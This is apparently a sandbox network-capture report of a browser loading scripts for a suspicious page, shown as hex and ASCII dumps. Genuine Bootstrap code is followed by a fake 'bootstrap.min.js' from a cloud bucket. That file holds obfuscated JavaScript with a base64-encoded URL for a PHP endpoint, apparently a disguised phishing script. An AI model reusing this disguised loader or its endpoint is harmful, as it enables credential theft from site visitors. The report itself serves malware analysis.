                                                                                                                  2024-10-22 14:08:35 UTC1378INData Raw: 65 29 69 66 28 62 3d 3d 3d 61 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 42 3d 62 3f 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 61 3d 3d 3d 62 29 72 65 74 75 72 6e 20 6c 3d 21 30 2c 30 3b 76 61 72 20 64 3d 21 61 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 62 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 64 3f 64 3a 28 64 3d 28 61 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 61 29 3d 3d 3d 28 62 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 62 29 3f 61 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 62 29 3a 31 2c 31 26 64 7c 7c 21 63 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 62 2e 63 6f 6d 70 61 72 65 44 6f 63 75
                                                                                                                  Data Ascii: e)if(b===a)return!0;return!1},B=b?function(a,b){if(a===b)return l=!0,0;var d=!a.compareDocumentPosition-!b.compareDocumentPosition;return d?d:(d=(a.ownerDocument||a)===(b.ownerDocument||b)?a.compareDocumentPosition(b):1,1&d||!c.sortDetached&&b.compareDocu


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  31192.168.2.1649758104.18.11.2074432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:08:35 UTC656OUTGET /bootstrap/4.1.3/js/bootstrap.min.js HTTP/1.1
                                                                                                                  Host: stackpath.bootstrapcdn.com
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                  Referer: https://apeidieppe-d.basiic.net/
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:08:35 UTC965INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 22 Oct 2024 14:08:35 GMT
                                                                                                                  Content-Type: application/javascript; charset=utf-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  CDN-PullZone: 252412
                                                                                                                  CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
                                                                                                                  CDN-RequestCountryCode: US
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  Cache-Control: public, max-age=31919000
                                                                                                                  ETag: W/"67176c242e1bdc20603c878dee836df3"
                                                                                                                  Last-Modified: Mon, 25 Jan 2021 22:04:06 GMT
                                                                                                                  CDN-ProxyVer: 1.04
                                                                                                                  CDN-RequestPullSuccess: True
                                                                                                                  CDN-RequestPullCode: 200
                                                                                                                  CDN-CachedAt: 10/04/2024 02:53:43
                                                                                                                  CDN-EdgeStorageId: 1029
                                                                                                                  timing-allow-origin: *
                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  CDN-Status: 200
                                                                                                                  CDN-RequestTime: 0
                                                                                                                  CDN-RequestId: e91c2640b4ae056de948031f7176693c
                                                                                                                  CDN-Cache: HIT
                                                                                                                  CF-Cache-Status: HIT
                                                                                                                  Age: 55723
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d6a0f6c2d17467e-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  2024-10-22 14:08:35 UTC404INData Raw: 37 62 65 65 0d 0a 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 31 2e 33 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28
                                                                                                                  Data Ascii: 7bee/*! * Bootstrap v4.1.3 (https://getbootstrap.com/) * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */!function(
                                                                                                                  2024-10-22 14:08:35 UTC1369INData Raw: 69 6e 65 28 5b 22 65 78 70 6f 72 74 73 22 2c 22 6a 71 75 65 72 79 22 2c 22 70 6f 70 70 65 72 2e 6a 73 22 5d 2c 65 29 3a 65 28 74 2e 62 6f 6f 74 73 74 72 61 70 3d 7b 7d 2c 74 2e 6a 51 75 65 72 79 2c 74 2e 50 6f 70 70 65 72 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 68 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 69 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 65 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 69 3d 65 5b 6e 5d 3b 69 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 69 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 69 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 69 26 26 28 69 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e
                                                                                                                  Data Ascii: ine(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defin
                                                                                                                  2024-10-22 14:08:35 UTC1369INData Raw: 50 6e 2c 6a 6e 2c 48 6e 2c 4c 6e 2c 52 6e 2c 78 6e 2c 57 6e 2c 55 6e 2c 71 6e 2c 46 6e 3d 66 75 6e 63 74 69 6f 6e 28 69 29 7b 76 61 72 20 65 3d 22 74 72 61 6e 73 69 74 69 6f 6e 65 6e 64 22 3b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 2c 6e 3d 21 31 3b 72 65 74 75 72 6e 20 69 28 74 68 69 73 29 2e 6f 6e 65 28 6c 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 3d 21 30 7d 29 2c 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 7c 7c 6c 2e 74 72 69 67 67 65 72 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 65 29 7d 2c 74 29 2c 74 68 69 73 7d 76 61 72 20 6c 3d 7b 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 3a 22 62 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 22 2c 67 65 74 55 49 44 3a
                                                                                                                  Data Ascii: Pn,jn,Hn,Ln,Rn,xn,Wn,Un,qn,Fn=function(i){var e="transitionend";function t(t){var e=this,n=!1;return i(this).one(l.TRANSITION_END,function(){n=!0}),setTimeout(function(){n||l.triggerTransitionEnd(e)},t),this}var l={TRANSITION_END:"bsTransitionEnd",getUID:
                                                                                                                  2024-10-22 14:08:35 UTC1369INData Raw: 6e 64 6c 65 72 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 7d 2c 6c 7d 28 65 29 2c 4b 6e 3d 28 6e 3d 22 61 6c 65 72 74 22 2c 61 3d 22 2e 22 2b 28 6f 3d 22 62 73 2e 61 6c 65 72 74 22 29 2c 63 3d 28 72 3d 65 29 2e 66 6e 5b 6e 5d 2c 75 3d 7b 43 4c 4f 53 45 3a 22 63 6c 6f 73 65 22 2b 61 2c 43 4c 4f 53 45 44 3a 22 63 6c 6f 73 65 64 22 2b 61 2c 43 4c 49 43 4b 5f 44 41 54 41 5f 41 50 49 3a 22 63 6c 69 63 6b 22 2b 61 2b 22 2e 64 61 74 61 2d 61 70 69 22 7d 2c 66 3d 22 61 6c 65 72 74 22 2c 64 3d 22 66 61 64 65 22 2c 67 3d 22 73 68 6f 77 22 2c 5f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 69 28 74 29 7b 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 3d 74 7d 76 61 72 20 74 3d 69 2e 70 72 6f 74 6f 74 79 70 65 3b 72 65 74 75 72 6e
                                                                                                                  Data Ascii: ndler.apply(this,arguments)}},l}(e),Kn=(n="alert",a="."+(o="bs.alert"),c=(r=e).fn[n],u={CLOSE:"close"+a,CLOSED:"closed"+a,CLICK_DATA_API:"click"+a+".data-api"},f="alert",d="fade",g="show",_=function(){function i(t){this._element=t}var t=i.prototype;return
                                                                                                                  2024-10-22 14:08:35 UTC1369INData Raw: 2e 5f 68 61 6e 64 6c 65 44 69 73 6d 69 73 73 28 6e 65 77 20 5f 29 29 2c 72 2e 66 6e 5b 6e 5d 3d 5f 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2c 72 2e 66 6e 5b 6e 5d 2e 43 6f 6e 73 74 72 75 63 74 6f 72 3d 5f 2c 72 2e 66 6e 5b 6e 5d 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 2e 66 6e 5b 6e 5d 3d 63 2c 5f 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 7d 2c 5f 29 2c 4d 6e 3d 28 70 3d 22 62 75 74 74 6f 6e 22 2c 79 3d 22 2e 22 2b 28 76 3d 22 62 73 2e 62 75 74 74 6f 6e 22 29 2c 45 3d 22 2e 64 61 74 61 2d 61 70 69 22 2c 43 3d 28 6d 3d 65 29 2e 66 6e 5b 70 5d 2c 54 3d 22 61 63 74 69 76 65 22 2c 62 3d 22 62 74 6e 22 2c 49 3d 27 5b 64 61 74 61 2d 74 6f 67 67 6c 65 5e 3d 22 62 75 74 74 6f 6e 22 5d 27 2c
                                                                                                                  Data Ascii: ._handleDismiss(new _)),r.fn[n]=_._jQueryInterface,r.fn[n].Constructor=_,r.fn[n].noConflict=function(){return r.fn[n]=c,_._jQueryInterface},_),Mn=(p="button",y="."+(v="bs.button"),E=".data-api",C=(m=e).fn[p],T="active",b="btn",I='[data-toggle^="button"]',
                                                                                                                  2024-10-22 14:08:35 UTC1369INData Raw: 29 7b 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 76 61 72 20 65 3d 74 2e 74 61 72 67 65 74 3b 6d 28 65 29 2e 68 61 73 43 6c 61 73 73 28 62 29 7c 7c 28 65 3d 6d 28 65 29 2e 63 6c 6f 73 65 73 74 28 4e 29 29 2c 6b 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2e 63 61 6c 6c 28 6d 28 65 29 2c 22 74 6f 67 67 6c 65 22 29 7d 29 2e 6f 6e 28 4f 2e 46 4f 43 55 53 5f 42 4c 55 52 5f 44 41 54 41 5f 41 50 49 2c 49 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 6d 28 74 2e 74 61 72 67 65 74 29 2e 63 6c 6f 73 65 73 74 28 4e 29 5b 30 5d 3b 6d 28 65 29 2e 74 6f 67 67 6c 65 43 6c 61 73 73 28 53 2c 2f 5e 66 6f 63 75 73 28 69 6e 29 3f 24 2f 2e 74 65 73 74 28 74 2e 74 79 70 65 29 29 7d 29 2c 6d 2e 66 6e 5b 70 5d 3d 6b 2e 5f 6a 51 75 65 72 79 49 6e
                                                                                                                  Data Ascii: ){t.preventDefault();var e=t.target;m(e).hasClass(b)||(e=m(e).closest(N)),k._jQueryInterface.call(m(e),"toggle")}).on(O.FOCUS_BLUR_DATA_API,I,function(t){var e=m(t.target).closest(N)[0];m(e).toggleClass(S,/^focus(in)?$/.test(t.type))}),m.fn[p]=k._jQueryIn
                                                                                                                  2024-10-22 14:08:35 UTC1369INData Raw: 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 6e 74 29 2c 74 68 69 73 2e 5f 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 28 29 7d 76 61 72 20 74 3d 6f 2e 70 72 6f 74 6f 74 79 70 65 3b 72 65 74 75 72 6e 20 74 2e 6e 65 78 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 69 73 53 6c 69 64 69 6e 67 7c 7c 74 68 69 73 2e 5f 73 6c 69 64 65 28 71 29 7d 2c 74 2e 6e 65 78 74 57 68 65 6e 56 69 73 69 62 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 21 64 6f 63 75 6d 65 6e 74 2e 68 69 64 64 65 6e 26 26 50 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 69 73 28 22 3a 76 69 73 69 62 6c 65 22 29 26 26 22 68 69 64 64 65 6e 22 21 3d 3d 50 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 63 73 73 28 22 76 69 73 69 62 69 6c 69 74 79
                                                                                                                  Data Ascii: is._element.querySelector(nt),this._addEventListeners()}var t=o.prototype;return t.next=function(){this._isSliding||this._slide(q)},t.nextWhenVisible=function(){!document.hidden&&P(this._element).is(":visible")&&"hidden"!==P(this._element).css("visibility
                                                                                                                  2024-10-22 14:08:35 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 3d 6c 28 7b 7d 2c 57 2c 74 29 2c 46 6e 2e 74 79 70 65 43 68 65 63 6b 43 6f 6e 66 69 67 28 6a 2c 74 2c 55 29 2c 74 7d 2c 74 2e 5f 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 6b 65 79 62 6f 61 72 64 26 26 50 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 6f 6e 28 51 2e 4b 45 59 44 4f 57 4e 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 65 2e 5f 6b 65 79 64 6f 77 6e 28 74 29 7d 29 2c 22 68 6f 76 65 72 22 3d 3d 3d 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 70 61 75 73 65 26 26 28 50 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 6f 6e 28 51 2e 4d 4f 55 53 45 45 4e 54 45 52 2c
                                                                                                                  Data Ascii: function(t){return t=l({},W,t),Fn.typeCheckConfig(j,t,U),t},t._addEventListeners=function(){var e=this;this._config.keyboard&&P(this._element).on(Q.KEYDOWN,function(t){return e._keydown(t)}),"hover"===this._config.pause&&(P(this._element).on(Q.MOUSEENTER,
                                                                                                                  2024-10-22 14:08:35 UTC1369INData Raw: 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 74 68 69 73 2e 5f 69 6e 64 69 63 61 74 6f 72 73 45 6c 65 6d 65 6e 74 29 7b 76 61 72 20 65 3d 5b 5d 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 74 68 69 73 2e 5f 69 6e 64 69 63 61 74 6f 72 73 45 6c 65 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 24 29 29 3b 50 28 65 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 56 29 3b 76 61 72 20 6e 3d 74 68 69 73 2e 5f 69 6e 64 69 63 61 74 6f 72 73 45 6c 65 6d 65 6e 74 2e 63 68 69 6c 64 72 65 6e 5b 74 68 69 73 2e 5f 67 65 74 49 74 65 6d 49 6e 64 65 78 28 74 29 5d 3b 6e 26 26 50 28 6e 29 2e 61 64 64 43 6c 61 73 73 28 56 29 7d 7d 2c 74 2e 5f 73 6c 69 64 65 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 2c 69 2c 72 2c 6f 3d 74 68 69 73 2c 73
                                                                                                                  Data Ascii: ment=function(t){if(this._indicatorsElement){var e=[].slice.call(this._indicatorsElement.querySelectorAll($));P(e).removeClass(V);var n=this._indicatorsElement.children[this._getItemIndex(t)];n&&P(n).addClass(V)}},t._slide=function(t,e){var n,i,r,o=this,s
                                                                                                                  2024-10-22 14:08:35 UTC1369INData Raw: 2e 74 6f 28 69 29 3b 65 6c 73 65 20 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 6e 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 74 5b 6e 5d 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 27 4e 6f 20 6d 65 74 68 6f 64 20 6e 61 6d 65 64 20 22 27 2b 6e 2b 27 22 27 29 3b 74 5b 6e 5d 28 29 7d 65 6c 73 65 20 65 2e 69 6e 74 65 72 76 61 6c 26 26 28 74 2e 70 61 75 73 65 28 29 2c 74 2e 63 79 63 6c 65 28 29 29 7d 29 7d 2c 6f 2e 5f 64 61 74 61 41 70 69 43 6c 69 63 6b 48 61 6e 64 6c 65 72 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 46 6e 2e 67 65 74 53 65 6c 65 63 74 6f 72 46 72 6f 6d 45 6c 65 6d 65 6e 74 28 74 68 69 73 29 3b 69 66 28 65 29 7b 76 61 72 20 6e 3d 50 28 65 29 5b 30 5d 3b 69 66 28
                                                                                                                  Data Ascii: .to(i);else if("string"==typeof n){if("undefined"==typeof t[n])throw new TypeError('No method named "'+n+'"');t[n]()}else e.interval&&(t.pause(),t.cycle())})},o._dataApiClickHandler=function(t){var e=Fn.getSelectorFromElement(this);if(e){var n=P(e)[0];if(


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  32192.168.2.1649759162.62.150.1764432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:08:35 UTC662OUTGET /bootstrap.min.js HTTP/1.1
                                                                                                                  Host: 5102487645-1323985617.cos.eu-frankfurt.myqcloud.com
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                  Referer: https://apeidieppe-d.basiic.net/
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:08:36 UTC425INHTTP/1.1 200 OK
                                                                                                                  Content-Type: text/javascript
                                                                                                                  Content-Length: 553296
                                                                                                                  Connection: close
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Content-Disposition: attachment
                                                                                                                  Date: Tue, 22 Oct 2024 14:08:36 GMT
                                                                                                                  ETag: "34612323af677d49270e6accc3887f01"
                                                                                                                  Last-Modified: Mon, 30 Sep 2024 13:23:44 GMT
                                                                                                                  Server: tencent-cos
                                                                                                                  x-cos-force-download: true
                                                                                                                  x-cos-hash-crc64ecma: 5505436874855358963
                                                                                                                  x-cos-request-id: NjcxN2IxZTNfZjdhZDM0MGJfMTA4YjdfYTFmM2Qw
                                                                                                                  2024-10-22 14:08:36 UTC7779INData Raw: 76 61 72 20 66 69 6c 65 20 3d 20 22 61 48 52 30 63 48 4d 36 4c 79 38 31 4d 54 41 79 4e 44 67 33 4e 6a 51 31 4c 6d 31 35 4c 6d 6c 6b 4c 32 35 6c 65 48 51 75 63 47 68 77 22 3b 0d 0a 0d 0a 76 61 72 20 5f 30 78 35 35 61 32 61 34 3d 5f 30 78 32 63 31 33 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 32 62 31 39 28 29 7b 76 61 72 20 5f 30 78 34 39 36 36 65 31 3d 5b 27 78 2d 6c 67 2d 72 6f 77 5c 78 32 30 7b 27 2c 27 63 6f 6c 6f 72 3a 5c 78 32 30 74 72 61 27 2c 27 64 69 76 5c 78 32 30 69 64 3d 5c 78 32 32 6d 61 27 2c 27 2d 6c 67 2d 30 5c 78 32 30 7b 5c 78 32 30 6d 61 27 2c 27 7e 2e 76 61 6c 69 64 2d 74 6f 27 2c 27 31 7c 34 7c 30 7c 32 7c 36 7c 27 2c 27 6e 2d 74 6f 70 3a 5c 78 32 30 31 2e 35 27 2c 27 3a 66 6f 63 75 73 2c 5c 78 32 30 2e 66 27 2c 27 6e 69 6e 67 5c 78 32 30
                                                                                                                  Data Ascii: var file = "aHR0cHM6Ly81MTAyNDg3NjQ1Lm15LmlkL25leHQucGhw";var _0x55a2a4=_0x2c13;function _0x2b19(){var _0x4966e1=['x-lg-row\x20{','color:\x20tra','div\x20id=\x22ma','-lg-0\x20{\x20ma','~.valid-to','1|4|0|2|6|','n-top:\x201.5',':focus,\x20.f','ning\x20
                                                                                                                  2024-10-22 14:08:36 UTC8184INData Raw: 2d 77 65 62 6b 69 74 2d 73 65 27 2c 27 5c 78 32 30 2e 35 29 5c 78 32 30 7d 5c 78 32 30 2e 63 75 27 2c 27 6f 70 6f 76 65 72 2d 61 75 74 27 2c 27 6c 69 6e 65 3a 5c 78 32 30 30 3b 5c 78 32 30 6f 27 2c 27 5c 78 32 30 31 33 3b 5c 78 32 30 6f 72 64 65 72 27 2c 27 75 74 74 6f 6e 5c 78 32 32 5c 78 32 30 63 6c 61 27 2c 27 69 67 68 74 3a 5c 78 32 30 31 30 37 70 27 2c 27 23 5c 78 32 30 73 6f 75 72 63 65 4d 61 27 2c 27 31 30 30 25 5c 78 32 30 7d 5c 78 32 30 2e 6f 72 27 2c 27 3a 5c 78 32 30 72 69 67 68 74 3b 5c 78 32 30 6d 27 2c 27 7d 5c 78 32 30 2e 6c 69 73 74 2d 75 6e 27 2c 27 64 61 72 79 3a 68 6f 76 65 72 27 2c 27 63 6f 6e 74 72 6f 6c 2b 2e 63 27 2c 27 69 67 6e 2d 6d 69 64 64 6c 65 27 2c 27 78 2d 77 69 64 74 68 3a 5c 78 32 30 34 27 2c 27 73 6d 2d 34 5c 78 32 30 7b
                                                                                                                  Data Ascii: -webkit-se','\x20.5)\x20}\x20.cu','opover-aut','line:\x200;\x20o','\x2013;\x20order','utton\x22\x20cla','ight:\x20107p','#\x20sourceMa','100%\x20}\x20.or',':\x20right;\x20m','}\x20.list-un','dary:hover','control+.c','ign-middle','x-width:\x204','sm-4\x20{
                                                                                                                  2024-10-22 14:08:36 UTC8184INData Raw: 30 2e 27 2c 27 6c 69 64 5c 78 32 30 23 64 65 65 32 65 27 2c 27 61 63 65 2d 61 72 6f 75 6e 64 27 2c 27 75 73 2c 5c 78 32 30 61 2e 62 67 2d 77 27 2c 27 61 28 30 2c 5c 78 32 30 31 32 33 2c 5c 78 32 30 27 2c 27 53 79 6d 62 6f 6c 5c 78 32 32 3b 5c 78 32 30 2d 27 2c 27 6f 6e 3a 5c 78 32 30 72 6f 77 5c 78 32 30 21 69 27 2c 27 5c 78 32 37 2c 5c 78 32 37 53 65 67 6f 65 5c 78 32 30 55 27 2c 27 61 6c 65 72 74 2d 6c 69 67 68 27 2c 27 6e 64 65 78 3a 5c 78 32 30 31 3b 5c 78 32 30 74 27 2c 27 75 70 2d 69 74 65 6d 2d 70 72 27 2c 27 74 65 64 5c 78 32 30 2e 63 75 73 74 6f 27 2c 27 6e 65 5c 78 32 30 2e 69 6e 70 75 74 2d 27 2c 27 69 6e 6b 4d 61 63 53 79 73 74 27 2c 27 73 70 61 6e 3e 57 65 5c 78 32 30 74 65 27 2c 27 68 57 4e 5a 66 27 2c 27 6c 75 74 65 5c 78 32 30 7d 5c 78 32
                                                                                                                  Data Ascii: 0.','lid\x20#dee2e','ace-around','us,\x20a.bg-w','a(0,\x20123,\x20','Symbol\x22;\x20-','on:\x20row\x20!i','\x27,\x27Segoe\x20U','alert-ligh','ndex:\x201;\x20t','up-item-pr','ted\x20.custo','ne\x20.input-','inkMacSyst','span>We\x20te','hWNZf','lute\x20}\x2
                                                                                                                  2024-10-22 14:08:36 UTC8184INData Raw: 3a 5c 78 32 30 27 2c 27 64 2d 63 6c 69 70 3a 5c 78 32 30 62 6f 27 2c 27 32 35 35 2c 5c 78 32 30 2e 32 35 29 5c 78 32 30 27 2c 27 35 3b 5c 78 32 30 6f 72 64 65 72 3a 5c 78 32 30 27 2c 27 74 65 6e 74 3a 5c 78 32 30 63 65 6e 74 27 2c 27 31 30 5c 78 32 30 7b 5c 78 32 30 6d 61 72 67 69 27 2c 27 74 74 6f 6d 3a 5c 78 32 30 2e 35 72 65 27 2c 27 4e 43 4c 4d 75 27 2c 27 69 76 3e 5c 78 32 30 3c 2f 66 6f 72 6d 27 2c 27 74 65 72 6c 69 6d 69 74 3d 5c 78 32 37 27 2c 27 6d 61 72 67 69 6e 3a 5c 78 32 30 2e 35 27 2c 27 74 2d 68 69 64 65 5c 78 32 30 7b 5c 78 32 30 66 27 2c 27 6e 6f 6e 65 3b 5c 78 32 30 2d 6d 6f 7a 27 2c 27 72 6f 70 6c 65 66 74 5c 78 32 30 2e 64 27 2c 27 6c 69 64 5c 78 32 30 7b 5c 78 32 30 62 6f 72 64 27 2c 27 2e 70 6c 2d 35 2c 5c 78 32 30 2e 70 78 27 2c 27
                                                                                                                  Data Ascii: :\x20','d-clip:\x20bo','255,\x20.25)\x20','5;\x20order:\x20','tent:\x20cent','10\x20{\x20margi','ttom:\x20.5re','NCLMu','iv>\x20</form','terlimit=\x27','margin:\x20.5','t-hide\x20{\x20f','none;\x20-moz','ropleft\x20.d','lid\x20{\x20bord','.pl-5,\x20.px','
                                                                                                                  2024-10-22 14:08:36 UTC8184INData Raw: 27 2c 27 5c 78 32 30 31 5c 78 32 30 7d 5c 78 32 30 2e 6f 72 64 65 27 2c 27 33 33 33 33 33 25 5c 78 32 30 7d 5c 78 32 30 2e 27 2c 27 5b 68 72 65 66 5d 3a 68 6f 76 27 2c 27 2d 70 6f 70 6f 76 65 72 2d 74 27 2c 27 6f 6e 3a 5c 78 32 30 72 6f 77 2d 72 65 27 2c 27 2e 74 61 62 6c 65 5c 78 32 30 74 68 65 27 2c 27 43 63 65 62 59 27 2c 27 74 69 70 6c 65 5d 29 2c 5c 78 32 30 2e 27 2c 27 23 6c 6f 61 64 65 72 27 2c 27 43 6f 6c 6f 72 5c 78 32 30 45 6d 6f 6a 27 2c 27 6c 65 66 74 3a 5c 78 32 30 61 75 74 6f 27 2c 27 76 65 72 74 69 63 61 6c 3e 2e 27 2c 27 25 2c 5c 78 32 30 30 2c 5c 78 32 30 30 29 3b 5c 78 32 30 27 2c 27 28 5b 73 69 7a 65 5d 29 3a 6e 27 2c 27 73 2d 70 6f 70 6f 76 65 72 2d 27 2c 27 6f 74 74 6f 6d 3a 5c 78 32 30 30 5c 78 32 30 21 27 2c 27 2d 62 6f 78 2d 70 61
